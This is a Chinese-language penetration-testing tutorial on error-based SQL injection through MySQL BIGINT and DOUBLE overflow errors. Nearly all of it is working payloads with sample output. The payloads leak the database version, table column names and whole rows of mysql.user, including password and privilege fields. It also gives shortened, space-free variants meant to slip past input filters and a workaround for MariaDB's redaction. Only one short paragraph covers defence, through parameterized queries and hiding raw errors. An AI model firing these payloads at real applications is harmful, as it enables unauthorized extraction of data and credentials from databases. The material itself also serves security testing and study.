[渗透测试]mysql整数型溢出报错注入


利用环境:

MySQL 5.1 及更早版本不适用（不会产生带表达式回显的溢出错误）；5.5 及以后版本验证成功：整数运算溢出会抛出 ERROR 1690 (22003)，并把触发溢出的完整表达式原样回显在错误消息里，这正是本方法能用来带出数据的前提。

漏洞原理:

利用 MySQL 数据类型溢出：BIGINT UNSIGNED 的上限是 18446744073709551615，有符号 BIGINT 的范围是 -9223372036854775808 ~ 9223372036854775807，超出范围的算术运算会直接报错，而且错误消息会回显出错的整个表达式。

mysql> SELECT 18446744073709551610 * 2;

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'

mysql> SELECT -1 * 9223372036854775808;

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(-(1) * 9223372036854775808)'

（9223372036854775808 已经超过有符号 BIGINT 的上限，被当作 BIGINT UNSIGNED 处理，乘以 -1 得到负数，对无符号类型来说同样越界。）

 

爆数据库版本

思路：if() 的两个分支都返回同一个会溢出的常量，所以无论条件真假都会报错；条件里的子查询在报错之前已经被求值并常量折叠，version() 的结果就随着表达式一起回显到错误消息里。

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610));

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select 5.5 from dual),18446744073709551610,18446744073709551610))'

注意：这里 version() 的字符串出现在数值上下文中，被转换后只剩下 5.5；要拿到完整的版本串，用下文「解决方案」里 IS NOT NULL 的写法，字符串会原样回显。

 

爆字段名称

思路：派生表里的 select * 在回显时会被展开成带库名、表名的完整字段列表，因此不需要事先知道字段名就能把它们爆出来。外层的 as `` 是一个空的反引号别名（两个连续反引号），只是为了给派生表一个合法的名字。

mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'

 

爆字段值

思路：把子查询返回的一整行与一个常量元组做行比较，这会强制先求出该行的所有值并折叠进表达式，随后一起回显。右侧元组的列数必须与行的字段个数一致（此处 mysql.user 为 42 列），否则 MySQL 会先报列数不匹配的错误而不是溢出错误。读取 mysql.user 需要当前连接对该表有查询权限；另外错误消息有长度上限（见下文「漏洞分析」），字段很多的表会被截断，实际利用时更建议只选需要的字段。

mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610);

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))'

 

漏洞分析:

本方法属于报错注入，因此还有一个必须了解的限制：MySQL 错误消息的长度上限。查看 mysql/my_error.c：

/* Max length of a error message. Should be
kept in sync with MYSQL_ERRMSG_SIZE. */

#define ERRMSGSIZE (512)

也就是说，一条错误消息最多 512 字节，回显的表达式超出部分会被截断。利用时应尽量缩短 payload 本身（下文「简化版」的各种写法就是为此），并且只选取需要的字段、配合 limit/offset 分多次取数据，而不是一次带出整行。

从防御角度看：根因仍然是拼接 SQL，应当使用参数化查询；同时不要把数据库原始错误信息返回给客户端，否则任何能触发报错的注入点都可以被用来回显数据。

除此之外，还有一个问题需要提一下：如果目标是 MariaDB（MySQL 的一个分支），用上面的写法会发现并没有爆出想要的信息——MariaDB 在回显时用 # 代替了子查询的内容：

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'

解决方案：不把子查询放进 if() 的条件里，而是让它作为派生表的列直接参与算术运算。(i IS NOT NULL) 的结果为 1，1 - (-9223372036854775808) 超出有符号 BIGINT 的上限而报错，列 i 的字符串值会原样回显（MySQL 与 MariaDB 均适用）：

mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a;

ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - -(9223372036854775808))'

 

简化版

查询数据库版本（下面几种写法作用相同，区别只在于触发溢出的方式：BIGINT UNSIGNED 溢出、1E308*2 的 DOUBLE 溢出，或有符号 BIGINT 溢出；选哪种取决于过滤规则以及目标是 MySQL 还是 MariaDB）

SELECT 2*(if((SELECT * from (SELECT
(version()))s), 18446744073709551610, 18446744073709551610))

select 1E308*if((select*from(select
version())x),2,2)

SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a

select if(x,2,2)*1E308 from(select
version()x)y

获取字段名称（as `` 为空反引号别名，两个反引号连写；第二种写法省略 as 并用 `` 紧贴 limit 以缩短长度）

SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)

select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)

获取所有字段值（右侧元组的列数要与表的字段个数相同，先用下文「获取字段个数」的方法确认；受 512 字节错误消息长度限制，字段多的表会被截断）

SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)

相当于

select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)<(select*from mysql.user limit 0),2,2)

获取指定字段值（注意：MySQL 默认 sql_mode 下 || 是逻辑 OR 而不是字符串连接，除非开启了 PIPES_AS_CONCAT；不过这不影响利用——回显的是折叠后的完整表达式，各字段的值都会出现在里面）

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)

获取字段个数（把整行与单列做行比较，触发的是列数不匹配的错误，错误消息里给出的列数即字段个数）

select 1E308*if((select*from mysql.user limit 1)>(select 1),2,2)

下面这条用 1e308 和 0 作为 if() 的两个分支：若条件被折叠为 0（用 | 做按位或时字符串一般会被转成 0），if() 返回 0，2*0 不会溢出也就不会报错；两个分支使用同一个会溢出的常量更稳妥。

select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0);

select if((select
user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit
1),2,2)*1E308

select (x!=0x00)-9223372036854775808 from(SELECT version()x)y

select!x-~0.FROM(select+user()x)f;

（最短写法：~0 即 18446744073709551615，!x 为 0，0 减去它得到负数从而触发 BIGINT UNSIGNED 溢出，user() 的值随表达式回显；0. 后面紧跟 FROM、用 + 代替空格，都是为了压缩长度和绕过对空格的过滤。）
